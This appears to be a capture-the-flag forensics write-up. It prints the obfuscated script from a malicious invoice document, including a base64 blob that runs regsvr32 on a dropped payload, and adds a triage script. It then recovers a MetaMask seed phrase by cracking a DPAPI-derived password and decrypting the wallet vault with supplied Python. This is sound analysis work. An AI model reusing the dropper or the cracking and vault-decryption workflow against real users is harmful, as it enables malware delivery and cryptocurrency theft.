We have a malicious document file that contains macros and other embedded content.
The first step is to extract the document file “Invoice_Q1–2021.doc” like any other zip or rar archive:
After extracting the file, we can view all the malicious content.
Starting with the “Invoice_Q1–2021\word\vbaData.xml” file, we can get the full macro name, which is “PROJECT.AYAIQ5.AUTOOPEN”.
Moving on to “Invoice_Q1–2021\word\document.xml”, we can see a lot of malicious content that needs more investigation:
<w:t><html><body><div id="content">hello</div><script language="javascript">var aWKdF = "a9oLN";function aUgasq(awFTPc){var aD07t = "a0EKB";acWBi = aD07t.toLowerCase();var aPWzqv = false;var aD0Mks = -41878;return(new ActiveXObject(awFTPc));}ae1Al = -8406;var azd3Iw = -28262;abKXU = "aYUGr";function aUrMf(aQPiI){var e={},i,b=0,c,x,l=0,a,a8qHR="",w=String.fromCharCode,L=aQPiI.length;var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";for(i=0;i<64;i++){e[A.charAt(i)]=i;}for(x=0;x<L;x++){c=e[aQPiI.charAt(x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(a8qHR+=w(a));}}return(a8qHR);};a0chb2 = false;aPCUL7 = window;a1oWCZ = -33192;aBd7i = document;var aXhVs = "apKsW";aPCUL7.resizeTo(1, 1);aupXs7 = false;aXRTl2 = true;aPCUL7.moveTo(-100, -100);aJM8V1 = -49805;var amlU3 = -36589;var aTnbMl = 41478;var aTqS3V = "act038";var aKI6ix = aTqS3V.toLowerCase();aae3kO = 32908;aITus4 = "aoXe2L";var aDUOYP = aITus4.toString();var a3KlRp = aUrMf("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");var aE1HIO = aUrMf("CQkJCQkJCW5ldyBBY3RpdmVYT2JqZWN0KCJ3c2NyaXB0LnNoZWxsIikucnVuKCJyZWdzdnIzMiBjOlxccHJvZ3JhbWRhdGFcXGFaZTRJLnRtcCIpOw0KCQkJCQkJCXZhciBhRVFicFUgPSBuZXcgQWN0aXZlWE9iamVjdCgic2NyaXB0aW5nLmZpbGVzeXN0ZW1vYmplY3QiKTsNCgkJCQkJCQlhRVFicFUuZGVsZXRlZmlsZSgiYzpcXHByb2dyYW1kYXRhXFxhWmU0SS5odGEiKTs=");</script><script language="javascript">var a4EQx = -19950;function aQ3AaU(a71O9o){var an6WK = "aRLg9";var a5X0Gz = an6WK.toLowerCase();var a8B3lh = "aSwVuU";aUaQNt = a8B3lh.toLowerCase();var akSl73 = aUgasq("msscriptcontrol.scriptcontrol");arCgh1 = "aHX0J";akSl73.Language = "jscript";var aM86j = true;aVTiFm = -35420;akSl73.Timeout = 60000;amH0b = true;axXiRp = true;akSl73.AddCode(a71O9o);axGBr = 38917;var a30g4 = true;return(null);}</script><script language="vbscript">aQ3AaU a3KlRp : aQ3AaU aE1HIO : aPCUL7.close</script></body></html></w:t>

After investigation, we can see two big base64-encoded strings, both passed to the script’s own decoder function (aUrMf, which is plain standard base64):

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

CQkJCQkJCW5ldyBBY3RpdmVYT2JqZWN0KCJ3c2NyaXB0LnNoZWxsIikucnVuKCJyZWdzdnIzMiBjOlxccHJvZ3JhbWRhdGFcXGFaZTRJLnRtcCIpOw0KCQkJCQkJCXZhciBhRVFicFUgPSBuZXcgQWN0aXZlWE9iamVjdCgic2NyaXB0aW5nLmZpbGVzeXN0ZW1vYmplY3QiKTsNCgkJCQkJCQlhRVFicFUuZGVsZXRlZmlsZSgiYzpcXHByb2dyYW1kYXRhXFxhWmU0SS5odGEiKTs=
Now let’s take a look in CyberChef; once both strings are decoded, we can answer all the other questions immediately:
c2 domain: 5that6[.]com
payload file name: aZe4I.tmp
system utility used for execution: regsvr32
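One way to automate the triage above (unzip the document, pull the text runs out of word/document.xml, decode any base64 literals the smuggled script passes to its decoder, and list the ActiveX objects, commands and file paths that fall out), as an added Python example that is not part of the original writeup. The document.xml and vbaData.xml it builds are constructed fixtures that embed only the second base64 blob from the page (the first is not reproduced here); since the page’s aUrMf decoder is plain standard base64, base64.b64decode is enough to reverse it.

```python
"""Triage helper for OOXML documents that smuggle HTML/JScript inside word/document.xml.
Added example, not the writeup author's code. Assumes the usual zip layout of a
.docx (word/document.xml, word/vbaData.xml) and a standard-alphabet base64 decoder."""
import base64
import os
import re
import tempfile
import zipfile
from html import unescape

# Second base64 blob from the analysed document (the first one is not reproduced).
SECOND_BLOB = (
    "CQkJCQkJCW5ldyBBY3RpdmVYT2JqZWN0KCJ3c2NyaXB0LnNoZWxsIikucnVuKCJyZWdzdnIzMiBjOlxccHJvZ3JhbWRhdGFcXGFaZTRJLnRtcCIpOw0K"
    "CQkJCQkJCXZhciBhRVFicFUgPSBuZXcgQWN0aXZlWE9iamVjdCgic2NyaXB0aW5nLmZpbGVzeXN0ZW1vYmplY3QiKTsNCg"
    "kJCQkJCQlhRVFicFUuZGVsZXRlZmlsZSgiYzpcXHByb2dyYW1kYXRhXFxhWmU0SS5odGEiKTs="
)

# Constructed fixture: how the smuggled HTML sits inside document.xml, XML-escaped.
SAMPLE_DOCUMENT_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    '<w:body><w:p><w:r><w:t>&lt;html&gt;&lt;body&gt;&lt;div id="content"&gt;hello&lt;/div&gt;'
    '&lt;script language="javascript"&gt;var aE1HIO = aUrMf("' + SECOND_BLOB + '");'
    '&lt;/script&gt;&lt;script language="vbscript"&gt;aQ3AaU aE1HIO : aPCUL7.close'
    '&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;</w:t></w:r></w:p></w:body></w:document>'
)
# Constructed fixture: a vbaData.xml carrying the macro name found on the page.
SAMPLE_VBA_DATA_XML = (
    '<wne:vbaSuppData xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">'
    '<wne:mcds><wne:mcd wne:macroName="PROJECT.AYAIQ5.AUTOOPEN" wne:name="AutoOpen"/></wne:mcds>'
    '</wne:vbaSuppData>'
)

W_T = re.compile(r"<w:t(?:\s[^>]*)?>(.*?)</w:t>", re.S)
BASE64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{40,}={0,2})"')   # quoted, long, base64 alphabet
ACTIVEX = re.compile(r'ActiveXObject\("([^"]+)"\)', re.I)
RUN_CALL = re.compile(r'\.run\("([^"]+)"\)', re.I)
WIN_PATH = re.compile(r"[A-Za-z]:(?:\\+[\w.-]+)+")              # tolerates JS-escaped backslashes


def extract_script_text(document_xml: str) -> str:
    """Concatenate all <w:t> runs and undo XML escaping so the smuggled HTML reads as HTML."""
    return unescape("".join(W_T.findall(document_xml)))


def find_encoded_payloads(script_text: str) -> list:
    """Decode every long quoted base64 literal that yields readable text."""
    decoded = []
    for literal in BASE64_LITERAL.findall(script_text):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # not base64 after all, or binary: leave for manual review
    return decoded


def summarize(blobs: list) -> dict:
    """Collect indicators (ordered, de-duplicated) from the script and its decoded layers."""
    def uniq(pattern, normalize=lambda s: s):
        return list(dict.fromkeys(normalize(m) for b in blobs for m in pattern.findall(b)))
    return {
        "activex": uniq(ACTIVEX),
        "commands": uniq(RUN_CALL),
        # collapse the JS-escaped "\\" so paths read as they would on disk
        "paths": uniq(WIN_PATH, lambda p: re.sub(r"\\+", r"\\", p)),
    }


def triage_docx(path: str) -> dict:
    """Open the document as a zip and report macros, decoded layers and indicators."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        read = lambda n: zf.read(n).decode("utf-8", "replace") if n in names else ""
        document_xml, vba_data_xml = read("word/document.xml"), read("word/vbaData.xml")
    script_text = extract_script_text(document_xml)
    payloads = find_encoded_payloads(script_text)
    report = summarize([script_text] + payloads)
    report["macros"] = re.findall(r'macroName="([^"]+)"', vba_data_xml)
    report["decoded_payloads"] = payloads
    return report


def demo_triage() -> dict:
    """Build a minimal archive from the constructed fixtures and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "Invoice_Q1-2021.doc")
        with zipfile.ZipFile(path, "w") as zf:
            zf.writestr("word/document.xml", SAMPLE_DOCUMENT_XML)
            zf.writestr("word/vbaData.xml", SAMPLE_VBA_DATA_XML)
        return triage_docx(path)


if __name__ == "__main__":
    for key, value in demo_triage().items():
        print(key, "=>", value)
```

Running the script on the fixture reports the macro name, the two ActiveX objects, the regsvr32 command and the two %ProgramData% paths; on a real sample, point triage_docx at the document itself. Anything that decodes to non-text is skipped on purpose rather than guessed at.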
We have a disk image file, “image.ad1”, whose content starts at “C:\Users\tarok\AppData”, so there is not much to see here.
I systematically examined all files within the disk image and found the “UsrClass.dat” file, which resides at “C:\Users\tarok\AppData\Local\Microsoft\Windows\UsrClass.dat”.
It contains per-user settings for apps and the Windows shell (e.g., recent files, UI customizations).
Opening the BagMRU key path, which resides in “UsrClass.dat: Local Settings\Software\Microsoft\Windows\Shell\BagMRU\”,
I found something very interesting that caught my eye directly.
I found this in the registry path “UsrClass.dat: Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1”.
We need a deeper investigation, so let’s dig deeper with ShellBags Explorer by the GOAT, Eric Zimmerman.
Load the offline hive, but remember: you must also export its transaction log file “UsrClass.dat.LOG1” for the hive to parse correctly.
After an extensive investigation of the provided disk image, here is what we have.
Initially, I examined all web browser data. While the Edge history database yielded no results, I identified interesting visited websites in Firefox’s history database: C:\Users\Wh1pl4sh\AppData\Roaming\Mozilla\Firefox\fvdbjn8o.default-release\places.sqlite
I found that he searched for “metamask”, which is a cryptocurrency wallet and browser extension that lets users manage Ethereum-based assets and interact with decentralized applications (dApps).
He also searched for a very important Medium link about how to get the seed phrase.
This gives us a very important insight into exactly what we are looking for, and a very valuable website that can be used to decrypt the data we are after.
With deeper investigation, I discovered the “metamask” extension in the default Firefox profile located at: C:\Users\Wh1pl4sh\AppData\Roaming\Mozilla\Firefox\fvdbjn8o.default-release\storage\default\<HERE>
It’s time to research. I searched for how to recover the secret recovery phrase correctly and found this precious link, which is from MetaMask support themselves.
Reading the Firefox section carefully, we can see how to retrieve the data correctly step by step, but I have a better idea.
With more investigation, we can go straight to the database that contains the encrypted data instead of following the support steps exactly.
After a lot of digging, I found the database that contains the encrypted data:
C:\Users\Wh1pl4sh\AppData\Roaming\Mozilla\Firefox\fvdbjn8o.default-release\storage\default\moz-extension+++9d43d20e-c6b8-4b71-b6ad-5a503dedc147\idb\3117620802mpeutkacmaabs-k.sqlite
The keys in this IndexedDB database are Caesar-ciphered (each character shifted) as follows:
Our encrypted vault is in “0KeyringController”; let’s take a look:
{"data":"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","iv":"NJ5Mq2Azg7GzwgKc8ZgXDA==","keyMetadata":{"algorithm":"PBKDF2","params":{"iterations":600000}},"salt":"AZBa8AhppeaO1hoa1PyhIgUViSH3CF8urWwW2OxkHtg="}

Now let’s hop on to the MetaMask Vault Decryptor:
Now we need the correct password. Since the SAM registry file was deleted, we don’t have any other option to get the password except DPAPI.
DPAPI is the Windows API that encrypts user secrets using the user’s login password; its master keys are stored in AppData\Roaming\Microsoft\Protect\<SID> as AES-encrypted master key files.
So we need the user’s DPAPI master key file: AppData\Roaming\Microsoft\Protect\S-1-5-21-2430665207-3300790704-3908932582-1001\a3ef4996-d3ea-422c-9de1-62931c21fb47 and the user SID: S-1-5-21-2430665207-3300790704-3908932582-1001 to extract a hash for password cracking. Since we have both, let’s get to the Kali machine quickly.
We have the DPAPImk2john tool, which can significantly simplify our work.
Now that we have everything, let’s head back to the MetaMask Vault Decryptor with the password “iloveyou2” and decrypt the vault to get the Secret Backup Phrase.
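The vault layout shown above (a PBKDF2 key derived from the password with the recorded salt and iteration count, then AES-GCM with the recorded iv, with the GCM tag appended to the ciphertext) is what the MetaMask Vault Decryptor performs in the browser. The following is an added Python example that is neither the decryptor’s nor MetaMask’s code: it assumes the cryptography package for AES-GCM (the key derivation itself is standard library), assumes 10,000 iterations for old vaults that carry no keyMetadata, reuses the page’s iv, salt and keyMetadata with a placeholder where the ciphertext was, and round-trips a constructed keyring payload with its own random salt and iv.

```python
"""Decrypt a MetaMask vault (PBKDF2-HMAC-SHA256 + AES-256-GCM).
Added example, not MetaMask's or the Vault Decryptor's own code.
Assumes: `pip install cryptography`; legacy vaults without keyMetadata use 10,000 iterations."""
import base64
import hashlib
import json
import os

LEGACY_ITERATIONS = 10_000   # assumption for vaults that predate keyMetadata

# The page's vault with the real "data" value replaced by a constructed placeholder.
PAGE_VAULT_JSON = json.dumps({
    "data": base64.b64encode(b"<ciphertext placeholder>").decode(),
    "iv": "NJ5Mq2Azg7GzwgKc8ZgXDA==",
    "keyMetadata": {"algorithm": "PBKDF2", "params": {"iterations": 600000}},
    "salt": "AZBa8AhppeaO1hoa1PyhIgUViSH3CF8urWwW2OxkHtg=",
})


def parse_vault(vault_json: str) -> dict:
    """Base64-decode the vault fields and pick the iteration count the vault records."""
    vault = json.loads(vault_json)
    meta = vault.get("keyMetadata", {})
    if meta.get("algorithm", "PBKDF2") != "PBKDF2":
        raise ValueError("unsupported key derivation: %r" % meta.get("algorithm"))
    iterations = int(meta.get("params", {}).get("iterations", LEGACY_ITERATIONS))
    return {
        "data": base64.b64decode(vault["data"]),    # ciphertext || 16-byte GCM tag
        "iv": base64.b64decode(vault["iv"]),        # 12 or 16 bytes, as stored
        "salt": base64.b64decode(vault["salt"]),
        "iterations": iterations,
    }


def derive_key(password: str, salt: bytes, iterations: int) -> bytes:
    """PBKDF2-HMAC-SHA256, 256-bit output, over the UTF-8 password and the raw salt."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)


def decrypt_vault(vault_json: str, password: str):
    """Return the decrypted keyring list, or raise ValueError when the password is wrong."""
    from cryptography.exceptions import InvalidTag
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM
    vault = parse_vault(vault_json)
    key = derive_key(password, vault["salt"], vault["iterations"])
    try:
        plaintext = AESGCM(key).decrypt(vault["iv"], vault["data"], None)  # no AAD
    except InvalidTag:
        raise ValueError("wrong password: GCM tag check failed") from None
    return json.loads(plaintext.decode("utf-8"))


def encrypt_vault(keyrings, password: str, iterations: int = 600000) -> str:
    """Build a vault of the same shape (used here only to produce a test fixture)."""
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM
    salt, iv = os.urandom(32), os.urandom(16)
    key = derive_key(password, salt, iterations)
    data = AESGCM(key).encrypt(iv, json.dumps(keyrings).encode("utf-8"), None)
    return json.dumps({
        "data": base64.b64encode(data).decode(),
        "iv": base64.b64encode(iv).decode(),
        "keyMetadata": {"algorithm": "PBKDF2", "params": {"iterations": iterations}},
        "salt": base64.b64encode(salt).decode(),
    })


def demo_roundtrip(password: str = "iloveyou2"):
    """Encrypt a constructed keyring, decrypt it, and show a wrong password being rejected."""
    keyrings = [{"type": "HD Key Tree",
                 "data": {"mnemonic": "constructed placeholder, not the challenge phrase",
                          "numberOfAccounts": 1}}]
    vault_json = encrypt_vault(keyrings, password)
    recovered = decrypt_vault(vault_json, password)
    try:
        decrypt_vault(vault_json, password + "x")
        rejected = False
    except ValueError:
        rejected = True
    return recovered == keyrings, rejected


if __name__ == "__main__":
    print("page vault metadata:", {k: (v if k == "iterations" else len(v))
                                   for k, v in parse_vault(PAGE_VAULT_JSON).items()})
    print("round-trip ok, wrong password rejected:", demo_roundtrip())
```

With the real "data" value in place, decrypt_vault(PAGE_VAULT_JSON, "iloveyou2") returns the same keyring list the web decryptor shows. The 600,000 iterations are what make each password guess expensive, which is why the writeup cracks the DPAPI hash rather than the vault itself; the GCM tag is what turns a wrong password into a clean failure instead of garbage output.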